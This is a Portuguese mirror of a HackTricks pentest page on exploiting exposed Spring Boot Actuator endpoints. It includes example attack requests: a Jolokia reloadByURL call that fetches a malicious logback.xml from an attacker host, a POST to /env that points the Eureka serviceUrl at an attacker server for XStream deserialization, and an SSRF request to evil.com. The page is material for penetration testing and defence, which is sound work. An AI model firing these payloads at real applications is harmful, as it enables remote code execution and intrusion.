mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-29 22:43:11 +00:00
5.8 KiB
5.8 KiB
Spring Actuators
{% hint style="success" %}
Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Confira os planos de assinatura!
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.
Spring Auth Bypass
De https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Exploiting Spring Boot Actuators
Verifique a postagem original em [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Pontos Chave:
- Spring Boot Actuators registram endpoints como
/health
,/trace
,/beans
,/env
, etc. Nas versões 1 a 1.4, esses endpoints são acessíveis sem autenticação. A partir da versão 1.5, apenas/health
e/info
são não sensíveis por padrão, mas os desenvolvedores frequentemente desativam essa segurança. - Certos endpoints do Actuator podem expor dados sensíveis ou permitir ações prejudiciais:
/dump
,/trace
,/logfile
,/shutdown
,/mappings
,/env
,/actuator/env
,/restart
, e/heapdump
.- No Spring Boot 1.x, os actuators são registrados sob a URL raiz, enquanto no 2.x, eles estão sob o caminho base
/actuator/
.
Técnicas de Exploração:
- Execução Remota de Código via '/jolokia':
- O endpoint do actuator
/jolokia
expõe a Biblioteca Jolokia, que permite acesso HTTP a MBeans. - A ação
reloadByURL
pode ser explorada para recarregar configurações de log a partir de uma URL externa, o que pode levar a XXE cega ou Execução Remota de Código via configurações XML manipuladas. - URL de exemplo para exploração:
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml
.
- Modificação de Configuração via '/env':
- Se as Bibliotecas Spring Cloud estiverem presentes, o endpoint
/env
permite a modificação de propriedades ambientais. - As propriedades podem ser manipuladas para explorar vulnerabilidades, como a vulnerabilidade de desserialização do XStream no Eureka serviceURL.
- Exemplo de requisição POST para exploração:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
- Outras Configurações Úteis:
- Propriedades como
spring.datasource.tomcat.validationQuery
,spring.datasource.tomcat.url
, espring.datasource.tomcat.max-active
podem ser manipuladas para várias explorações, como injeção SQL ou alteração de strings de conexão de banco de dados.
Informações Adicionais:
- Uma lista abrangente de actuators padrão pode ser encontrada aqui.
- O endpoint
/env
no Spring Boot 2.x usa o formato JSON para modificação de propriedades, mas o conceito geral permanece o mesmo.
Tópicos Relacionados:
- Env + H2 RCE:
- Detalhes sobre a exploração da combinação do endpoint
/env
e do banco de dados H2 podem ser encontrados aqui.
- SSRF no Spring Boot Através da Interpretação Incorreta de Nomes de Caminho:
- O manuseio de parâmetros de matriz (
;
) pelo framework Spring em nomes de caminho HTTP pode ser explorado para Server-Side Request Forgery (SSRF). - Exemplo de requisição para exploração:
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
{% hint style="success" %}
Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Confira os planos de assinatura!
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
- Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.